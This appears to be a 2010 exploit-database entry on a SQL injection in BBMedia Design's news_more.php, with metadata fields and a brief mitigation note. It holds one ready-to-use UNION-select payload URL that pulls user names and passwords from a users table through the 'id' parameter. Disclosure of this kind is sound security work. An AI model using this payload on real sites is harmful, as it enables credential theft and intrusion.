vendor:
news_more.php
by:
gendenk
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: news_more.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
BBMedia Design’s (news_more.php) SQL Injection Vulnerability
The vulnerability exists in the 'news_more.php' script, which allows an attacker to inject malicious SQL queries via the 'id' parameter. An example of a malicious URL is http://[target]/[path]/news_more.php?id=-9999+union+all+select+1,2,concat(id,0x3a,user,0x3a,pass),4,5,6,7,8+from+users/*
Mitigation:
Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.